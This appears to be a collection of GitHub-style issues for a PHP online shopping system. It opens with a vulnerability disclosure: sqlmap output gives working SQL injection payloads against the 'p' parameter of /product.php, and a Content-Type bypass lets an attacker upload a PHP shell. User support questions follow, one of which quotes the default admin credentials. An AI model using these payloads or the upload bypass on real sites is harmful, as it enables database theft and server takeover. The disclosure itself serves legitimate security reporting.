SQL Injection

The online-shopping-system is vulnerable to un-authenticated error/boolean-based blind & error based SQL Injection attacks.

The p parameter on the /product.php page does not sanitize the user input, an attacker can extract sensisitive data from the underlying MySQL Database.
Poc's
SQLMAP PAYLOADS
p parameter on the /product.php page
pocs

GET parameter 'p' is vulnerable. Do you want to keep testing the others (if any)
? [y/N]

sqlmap identified the following injection point(s) with a total of 58 HTTP(s) re
quests:
---
Parameter: p (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=72 AND 2037=2037

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (FLOOR)
    Payload: p=72 AND (SELECT 1432 FROM(SELECT COUNT(*),CONCAT(0x7178707671,(SEL
ECT (ELT(1432=1432,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=72 AND (SELECT 2289 FROM (SELECT(SLEEP(5)))LMdY)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: p=72 UNION ALL SELECT CONCAT(0x7178707671,0x4b71516d647848537741636
571634e5a416a6a7a716367744d47654778554952467778625161716f,0x716b6a6a71),NULL,NUL
L,NULL,NULL,NULL,NULL,NULL-- -
---
[20:26:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP, PHP 5.5.9
back-end DBMS: MySQL >= 5.0

affected by Arbitrary File Upload

affected by Arbitrary File Upload at add_products line 22,Only verified Content-Type，so ,can modify Content-Type:

image/jpeg

filepath is ../product_images/1635249699_shell.php

I don't know why but when i login into my account i am redirected to homepage but initally it shows "2023" on the page and when we refresh it, it brings back to orignal working homepage. i also searched in all directories for this bug but couldn't find it. check this sir and reply me when you are free.

Please change admin password on Readme file. 123456789 not 123456789.

i can;t open admin panel, please help
whenever I login from these
email - [email protected]
password - 123456789
admin panel doesnt open up

where do I change the currency from usd to my preferred one?

This message is display while extracting the project file, "The archive is corrupt".

Can i get Synopsis for online -shopping -system .

I tried but admin can not delete any products.

Object not found!
The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again.

If you think this is a server error, please contact the webmaster.

Error 404
localhost
Apache/2.4.35 (Win32) OpenSSL/1.1.0i PHP/7.2.11

When we enter a wrong password / email during login. It displays this error messege:-

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\Test1\login.php on line 17

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\Test1\login.php on line 18
Please Register before login..!

Hello to whom may it concern your provided link is not opening..

http://localhost/online-shopping-system-with-advanced-admin-page-master.
The following link is not opening even after successful importing project.

from where admin will login ??????????